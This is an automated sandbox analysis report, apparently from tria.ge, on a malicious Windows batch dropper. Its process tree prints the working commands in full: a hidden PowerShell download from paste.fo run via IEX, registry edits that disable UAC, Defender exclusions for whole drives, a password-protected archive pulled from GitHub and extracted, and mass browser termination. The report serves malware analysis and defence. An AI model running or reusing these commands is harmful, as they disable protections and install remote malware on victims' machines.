Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
31/12/2024, 03:08
Static task
static1
Behavioral task
behavioral1
Sample
f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat
Resource
win10v2004-20241007-en
General
-
Target
f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat
-
Size
41KB
-
MD5
6b9cf24f2b691606642bd18bf2227a62
-
SHA1
046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
-
SHA256
f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
-
SHA512
db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
-
SSDEEP
768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO
Malware Config
Extracted
https://paste.fo/raw/a1af5a4d0301
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2068 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 2068 powershell.exe 2832 powershell.exe 1936 powershell.exe 1452 powershell.exe 2908 powershell.exe 2488 powershell.exe 2976 powershell.exe 1316 powershell.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 7 raw.githubusercontent.com 9 raw.githubusercontent.com 10 raw.githubusercontent.com 15 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 1600 timeout.exe 2788 timeout.exe -
Kills process with taskkill 12 IoCs
pid Process 1392 taskkill.exe 2288 taskkill.exe 688 taskkill.exe 1724 taskkill.exe 2152 taskkill.exe 1584 taskkill.exe 2332 taskkill.exe 1632 taskkill.exe 780 taskkill.exe 2140 taskkill.exe 1068 taskkill.exe 2336 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8414F9E1-C724-11EF-833B-EE9D5ADBD8E3} = "0" iexplore.exe -
Modifies registry key 1 TTPs 12 IoCs
pid Process 2632 reg.exe 352 reg.exe 1640 reg.exe 2872 reg.exe 2672 reg.exe 2736 reg.exe 2004 reg.exe 2392 reg.exe 2516 reg.exe 2660 reg.exe 2784 reg.exe 1804 reg.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2068 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 1316 powershell.exe 1936 powershell.exe 1452 powershell.exe 2908 powershell.exe 2488 powershell.exe 2976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2488 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeRestorePrivilege 2644 7z.exe Token: 35 2644 7z.exe Token: SeSecurityPrivilege 2644 7z.exe Token: SeDebugPrivilege 2332 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeDebugPrivilege 2288 taskkill.exe Token: SeDebugPrivilege 780 taskkill.exe Token: SeDebugPrivilege 2140 taskkill.exe Token: SeDebugPrivilege 688 taskkill.exe Token: SeDebugPrivilege 1068 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 2336 taskkill.exe Token: SeDebugPrivilege 2152 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2636 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2636 iexplore.exe 2636 iexplore.exe 1484 IEXPLORE.EXE 1484 IEXPLORE.EXE 1484 IEXPLORE.EXE 1484 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2584 wrote to memory of 2412 2584 cmd.exe 31 PID 2584 wrote to memory of 2412 2584 cmd.exe 31 PID 2584 wrote to memory of 2412 2584 cmd.exe 31 PID 2412 wrote to memory of 2068 2412 cmd.exe 33 PID 2412 wrote to memory of 2068 2412 cmd.exe 33 PID 2412 wrote to memory of 2068 2412 cmd.exe 33 PID 2412 wrote to memory of 2832 2412 cmd.exe 35 PID 2412 wrote to memory of 2832 2412 cmd.exe 35 PID 2412 wrote to memory of 2832 2412 cmd.exe 35 PID 2832 wrote to memory of 2332 2832 powershell.exe 36 PID 2832 wrote to memory of 2332 2832 powershell.exe 36 PID 2832 wrote to memory of 2332 2832 powershell.exe 36 PID 2332 wrote to memory of 2872 2332 cmd.exe 38 PID 2332 wrote to memory of 2872 2332 cmd.exe 38 PID 2332 wrote to memory of 2872 2332 cmd.exe 38 PID 2332 wrote to memory of 2672 2332 cmd.exe 39 PID 2332 wrote to memory of 2672 2332 cmd.exe 39 PID 2332 wrote to memory of 2672 2332 cmd.exe 39 PID 2412 wrote to memory of 2636 2412 cmd.exe 40 PID 2412 wrote to memory of 2636 2412 cmd.exe 40 PID 2412 wrote to memory of 2636 2412 cmd.exe 40 PID 2332 wrote to memory of 2736 2332 cmd.exe 41 PID 2332 wrote to memory of 2736 2332 cmd.exe 41 PID 2332 wrote to memory of 2736 2332 cmd.exe 41 PID 2412 wrote to memory of 1600 2412 cmd.exe 42 PID 2412 wrote to memory of 1600 2412 cmd.exe 42 PID 2412 wrote to memory of 1600 2412 cmd.exe 42 PID 2332 wrote to memory of 2660 2332 cmd.exe 43 PID 2332 wrote to memory of 2660 2332 cmd.exe 43 PID 2332 wrote to memory of 2660 2332 cmd.exe 43 PID 2332 wrote to memory of 2784 2332 cmd.exe 44 PID 2332 wrote to memory of 2784 2332 cmd.exe 44 PID 2332 wrote to memory of 2784 2332 cmd.exe 44 PID 2332 wrote to memory of 2632 2332 cmd.exe 45 PID 2332 wrote to memory of 2632 2332 cmd.exe 45 PID 2332 wrote to memory of 2632 2332 cmd.exe 45 PID 2332 wrote to memory of 1804 2332 cmd.exe 46 PID 2332 wrote to memory of 1804 2332 cmd.exe 46 PID 2332 wrote to memory of 1804 2332 cmd.exe 46 PID 2332 wrote to memory of 2004 2332 cmd.exe 47 PID 2332 wrote to memory of 2004 2332 cmd.exe 47 PID 2332 wrote to memory of 2004 2332 cmd.exe 47 PID 2636 wrote to memory of 1484 2636 iexplore.exe 48 PID 2636 wrote to memory of 1484 2636 iexplore.exe 48 PID 2636 wrote to memory of 1484 2636 iexplore.exe 48 PID 2636 wrote to memory of 1484 2636 iexplore.exe 48 PID 2332 wrote to memory of 352 2332 cmd.exe 49 PID 2332 wrote to memory of 352 2332 cmd.exe 49 PID 2332 wrote to memory of 352 2332 cmd.exe 49 PID 2332 wrote to memory of 1640 2332 cmd.exe 50 PID 2332 wrote to memory of 1640 2332 cmd.exe 50 PID 2332 wrote to memory of 1640 2332 cmd.exe 50 PID 2332 wrote to memory of 2392 2332 cmd.exe 51 PID 2332 wrote to memory of 2392 2332 cmd.exe 51 PID 2332 wrote to memory of 2392 2332 cmd.exe 51 PID 2332 wrote to memory of 2516 2332 cmd.exe 52 PID 2332 wrote to memory of 2516 2332 cmd.exe 52 PID 2332 wrote to memory of 2516 2332 cmd.exe 52 PID 2332 wrote to memory of 1316 2332 cmd.exe 53 PID 2332 wrote to memory of 1316 2332 cmd.exe 53 PID 2332 wrote to memory of 1316 2332 cmd.exe 53 PID 2332 wrote to memory of 1936 2332 cmd.exe 54 PID 2332 wrote to memory of 1936 2332 cmd.exe 54 PID 2332 wrote to memory of 1936 2332 cmd.exe 54
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2872
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
PID:2672
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2736
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2660
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2784
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2632
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1804
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2004
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:352
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1640
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2392
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2636 CREDAT:275457 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1484
-
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:1600
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:2788
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:780
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52462ca0181d56024d4f2cbddd415a2f4
SHA16a34cfdb689a005918251cdf808788349a4f43f4
SHA2560e873347a4fa5f8b8667eec21cc43c3274a937a4e814016766d021ee65e38dbe
SHA5128388ebe9a431fb42d2b1d0ebc9302c950cdc04dfe1bd3bbe5b9fd216ae30cdf83d91b6aa52c1e4e6fd633e4838636e06a89b5801c7bf92c8fe0bffa54bd7ac45
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD531a3ce7b37c4fa62668447a12e95c7c7
SHA125cc6b9be952c486d7a44f2f4fcfd1a5a64389ce
SHA2561a4e1bd6a33e8c09880150ff706df3be3913b37a2daf2a0156a6ff2c1627902b
SHA5126a3e51f94949fa529f005b5efcf8ebb59bb46d0c611e1a0dd44e34eae0c87da327a6802b6c3c0d31c28f289879a67831e9edc0f8f7f4c855f727d73986068c94
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54a5ee36d49dc15a4fff99a98eb700e7f
SHA1744ca763a1da1e1db10086a3191065e8d06dd8f2
SHA2561e7891601160af45287d3d9d916ee4528a3f8af4ed292673ac057ef987f40b8c
SHA512e4c49868c55539f3ea3d919dfb7f6051956ba967da3c2d7db736805bf4fb50b799c01cc34d1b87ec03780b89c3fa6e87b1d7d5ec8df9463fcc7d41a80a98cf38
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55c0080fa1cd8e0ea8cd984f8e9671272
SHA1c340b1c633929b3a3aa31f02cc0a5de0b7aaa6c0
SHA256e361b74b450860d17c3a697d2648e5c11ed95c25b7dfe6ef6b1d41263e6276b8
SHA5127de9f050c4ffa051a77f871732b1add885e60abf1c734c4eeb20d036308e1207e9322cb1436aed77c8e57e991743d969a8dc60ce42bbbea594964a27b5903eef
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5765f590fca6ea1ce3bb53d11fc26eaaf
SHA1ba7273ecc4e45584ea223876e8940a892824b8d1
SHA2560213c71d2cdb3baeb0c1a3009dc73e3f8ceb137d4f309aa559d42a22429a3f10
SHA512065099046c8e3005fc611ffb0ece4c8fe04e7ab8e7cf961b89505de062341b13f515de31d52f5674a6b4073a62fde820756bd6acd5a78f1f28011c681bf5617a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c707a8364997db2eb056bc7707e6a53c
SHA18c9da8bbef0bccb9f6cec4a62a89ce361a7645f6
SHA256bd780f84d54cc340e0f3eaf5d8e748545b3290396f503fdc994d7e944238441a
SHA51262231958c9cabde01020c8b9cb681e987e401f511493e8cb27d0fd8d1f0c6e85e1384d260859d610121cee7f5e0839a47799019bec74099f5561fa6ddf79df39
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56181534225162f62f3a04b9e7fbf5e47
SHA1082c515fb6746ae43bd47afcbf39994c7ebaa3a3
SHA2568a7213701e0bf1f10a237eb3a5c4bcba9089e48e7252f4509911f2e76ddd1cd5
SHA512f3959e416fba4518704fb75d8c384ff53c792fce7cf663acf0aa99b0c8cab451afc332dd57b7687a0512666ae3055878805729f63bfcd2ba0c22ad56291eafbe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD59d995dd57ade364dfe11e78b96ed5cb3
SHA1f02c8f4b4a3a0b9852c61806a1e5b9021d3d3ed8
SHA2564172d69de61cb0cb2758abeebe6bb3f5e6e962bd1963b9d7d8cab9ec3109b4b0
SHA512b40ed3840c382865116c7d61a47942fe1a53752d19493a5338f95e4972725b1ff98f4f454296b643654a9026690424f6da43de6fa93a985f8e3feacb55e1b4c6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD582ac5b0369c6e13d22b421d065cda6a6
SHA196f604096e4bd8cebc102435dd4130d3bf8059ec
SHA2567b4fbdb904d7ce1ca13b114a1f6c19d15334a2c08495670c32bbe45765c5c66b
SHA5123b47b021428a0cdb3f112a4c7faa200ed5b9838de4ddcb5f9a35d775790571386acc5faa7b8b890ead6992c288f54526e8cb89f75d7dd35d3f7171b6a537d069
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55507cbd4093894c1e70bfb422ce2b0ee
SHA1846c50e3e747810048d6865c98393fb13e570b59
SHA256d4e7f21101ddc9fce3111bf532753dac8f998f1cccd983771d428e2c6cf4836f
SHA512e5b94e6a94a7502ebc173d34d60977d604004cc013a602c1ac81da2c40172dc3ea6ac8b5beffdef283427044b804a0e6f87f313a257c7370e0a83cc785f9167f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52edbf6d4c41ec8778f5e3ec6907468d1
SHA13d115bdd077d57593b628b38b28abf90b2d18164
SHA256804374bea20addcd1376bab91abde6f06f7278cba244bab7a2e9bb1cdd386f2b
SHA512518de1d95b2a11fd69b44a5ea2d721e8d02661c954264e66aaf44133ad26e219f9cf2335e50a8c33bbc15cbe71e373c7f28c87ade42b1f5a126dc3c76eea860c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fbe337ad4283d1661daaa7d230031720
SHA1107cb22faaf0f078090adeb13bfe84587fb9500d
SHA256047c7ab240f7399d3274b1be1c45d7c85cfa4c00c11df040193501363f3837cc
SHA51270ed0816ea05ab6d9c955f7d5daf4bb16305cca3b48c1c45e1e0afd4828b2509fd323b4d42b789ff4caf293e305fd0b25227f0007b159ace143925eea85679b3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c3e5933e16df9038e466e3db71a8d1fe
SHA16003f84c84bc15ea0a4ffabfa4a992297b783a86
SHA25643718c1ab0f8365d62980e4c7e042973aecd2c673cb660d6eb079f9ff2265d83
SHA51278209909b2228cabbf547a2f7a8375852a92bc709e3017f665e7cc8b3c415dd2aba87244a8dd855a8edbfc9d547dc945ff6fcacf788f363c84857e6565feef4d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
